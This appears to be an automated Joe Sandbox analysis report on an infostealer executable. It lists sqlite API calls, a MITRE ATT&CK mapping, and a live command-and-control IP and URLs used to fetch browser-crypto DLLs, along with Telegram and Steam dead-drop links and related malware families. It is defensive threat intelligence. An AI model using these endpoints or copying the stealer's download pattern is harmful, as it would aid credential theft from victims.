Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B764140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	2_2_1B764140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6D06E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	2_2_1B6D06E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6A8680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	2_2_1B6A8680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6D8550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	2_2_1B6D8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6B8430 sqlite3_bind_int64,	2_2_1B6B8430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6B7810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_1B6B7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B743770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1B743770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7637E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1B7637E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6AB400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	2_2_1B6AB400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6DEF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	2_2_1B6DEF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6EE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	2_2_1B6EE200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6FE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1B6FE170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6EE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_1B6EE090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6FA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	2_2_1B6FA6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6966C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_1B6966C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	511 Process Injection	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	511 Process Injection	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	12 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	54 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	26%	ReversingLabs	Win32.Infostealer.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://116.202.190.18:5432l	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/softokn3.dllP	100%	Avira URL Cloud	malware
https://116.202.190.18/	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/softokn3.dll	100%	Avira URL Cloud	malware
http://ocsp.entrust.net02	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/msvcp140.dlldge	100%	Avira URL Cloud	malware
https://web.telegram.org	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/vcruntime140.dllIQ=E	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/softokn3.dllZ	100%	Avira URL Cloud	malware
https://116.202.190.18:5432Content-Disposition:	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/freebl3.dllEdge	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/sqls.dll	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/freebl3.dlla	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/reebl3.dll	100%	Avira URL Cloud	malware
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/mozglue.dllEdge	100%	Avira URL Cloud	malware
https://t.me/r8z0l	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/freebl3.dll	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/vcruntime140.dll9	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/nss3.dll	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/mozglue.dlls	100%	Avira URL Cloud	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/vcruntime140.dllser	100%	Avira URL Cloud	malware
http://crl.entrust.net/ts1ca.crl0	0%	Avira URL Cloud	safe
https://t.me/i	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/vcruntime140.dll/	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/sqls.dllx	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/vcruntime140.dll	100%	Avira URL Cloud	malware
https://116.202.190.18:5432	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/	100%	Avira URL Cloud	malware
http://www.sqlite.org/copyright.html.	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://116.202.190.18:5432fold	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/.190.18:5432/	100%	Avira URL Cloud	malware
https://t.me/w	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/oft	100%	Avira URL Cloud	malware
http://www.entrust.net/rpa03	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/My	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/nss3.dllO	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/mozglue.dll	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/softokn3.dllOMh	100%	Avira URL Cloud	malware
http://aia.entrust.net/ts1-chain256.cer01	0%	Avira URL Cloud	safe
https://116.202.190.18:5432A	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	Avira URL Cloud	safe
https://116.202.190.18:5432ing	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/nss3.dllft	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/msvcp140.dll	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/vcruntime140.dllUser	100%	Avira URL Cloud	malware
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
https://116.202.190.18:5432/ng	100%	Avira URL Cloud	malware
https://116.202.190.18:5432/softokn3.dlldge	100%	Avira URL Cloud	malware
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199698764354	100%	Avira URL Cloud	malware
https://www.entrust.net/rpa0	0%	Avira URL Cloud	safe
http://crl.entrust.net/2048ca.crl0	0%	Avira URL Cloud	safe
https://t.me/r8z0lF	0%	Avira URL Cloud	safe
https://116.202.190.18:5432AMicrosoft	0%	Avira URL Cloud	safe
https://116.202.190.18:5432c84cgle	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	true		unknown
198.187.3.20.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/r8z0l	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199698764354	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://116.202.190.18/	RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/softokn3.dllP	RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432l	RegAsm.exe, 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.telegram.org	RegAsm.exe, 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/msvcp140.dlldge	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.entrust.net03	file.exe	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net02	file.exe	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/softokn3.dll	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/vcruntime140.dllIQ=E	RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/freebl3.dllEdge	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/freebl3.dlla	RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432Content-Disposition:	RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/sqls.dll	RegAsm.exe, 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/reebl3.dll	RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/softokn3.dllZ	RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/mozglue.dllEdge	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/freebl3.dll	RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/vcruntime140.dll9	RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/mozglue.dlls	RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/nss3.dll	RegAsm.exe, 00000002.00000002.3326265923.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/vcruntime140.dll/	RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/vcruntime140.dllser	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://t.me/i	RegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/ts1ca.crl0	file.exe	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/sqls.dllx	RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/vcruntime140.dll	RegAsm.exe, 00000002.00000002.3326524144.0000000001268000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432	RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432fold	RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/.190.18:5432/	RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://t.me/w	RegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/oft	RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.entrust.net/rpa03	file.exe	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/nss3.dllO	RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/My	RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/softokn3.dllOMh	RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/mozglue.dll	RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432A	RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432ing	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/msvcp140.dll	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/nss3.dllft	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/vcruntime140.dllUser	RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432/ng	RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.190.18:5432/softokn3.dlldge	RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FBKECF.2.dr	false	Avira URL Cloud: safe	unknown
https://t.me/r8z0lF	RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe	false	Avira URL Cloud: safe	unknown
https://www.entrust.net/rpa0	file.exe	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432AMicrosoft	RegAsm.exe, 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://116.202.190.18:5432c84cgle	RegAsm.exe, 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
116.202.190.18	unknown	Germany		24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1453785
Start date and time:	2024-06-07 17:20:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/11@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 64 Number of non-executed functions: 245
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:21:13	API Interceptor	1x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
116.202.190.18	UmMgwOUPt5.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse
116.202.190.18	KLRA3j95ax.exe	Get hash	malicious	Vidar	Browse
149.154.167.99	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	KeyboardRGB.exe	Get hash	malicious	Unknown	Browse	t.me/cinoshibot
	file.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	https://xts5.uovuo.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://drop-manta.pages.dev/	Get hash	malicious	Unknown	Browse	162.159.152.4
	KLRA3j95ax.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://ikg.nqg.mybluehost.me/autrise.php	Get hash	malicious	Unknown	Browse	162.241.218.25
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	EXTERNAL Action required.msg	Get hash	malicious	Unknown	Browse	162.241.218.226
	Setup.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	http://jgt.ygs.mybluehost.me/mimderz/net	Get hash	malicious	HTMLPhisher	Browse	162.241.30.48
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	jL8AjRK30O.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	CV Elena Alba Garcia.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	4ef10e7296fb6c5df039a4b95147b1cb4482bdbee0a097863fe345b295302cc9_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	https://bb78t.xyz/	Get hash	malicious	Unknown	Browse	149.154.170.96
	https://xts5.uovuo.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	UmMgwOUPt5.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	149.154.167.99
	pwnp9WrC1wizLDM.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SOA.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	CV.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
HETZNER-ASDE	Update.js	Get hash	malicious	SocGholish	Browse	5.161.229.58
	Product Order Inquiry 37674309.exe	Get hash	malicious	AgentTesla	Browse	188.40.22.244
	PO 23897 Order Request.exe	Get hash	malicious	AgentTesla	Browse	88.99.81.131
	skid.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	46.4.110.37
	UmMgwOUPt5.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	116.202.190.18
	bank details.exe	Get hash	malicious	AgentTesla	Browse	144.76.243.60
	Correo postal 349892230.xls.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.40.116.241
	REMITTANCE SLIP.exe	Get hash	malicious	FormBook	Browse	178.63.50.103
	https://gegraph.software.informer.com/download/?cf1ef3c9	Get hash	malicious	Unknown	Browse	116.203.157.106
	hmwBElsQoPfbj1u.exe	Get hash	malicious	FormBook	Browse	135.181.212.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Update.js	Get hash	malicious	SocGholish	Browse	149.154.167.99
	Update.js	Get hash	malicious	SocGholish	Browse	149.154.167.99
	STARBURN.DLL.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	STARBURN.DLL.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	NF_e_07_2024_XML__.msi	Get hash	malicious	Unknown	Browse	149.154.167.99
	Payment slip.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99
	Tekstlinie.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99
	PO & Company profile.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99
	PYT W2471234-MLIG.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.99
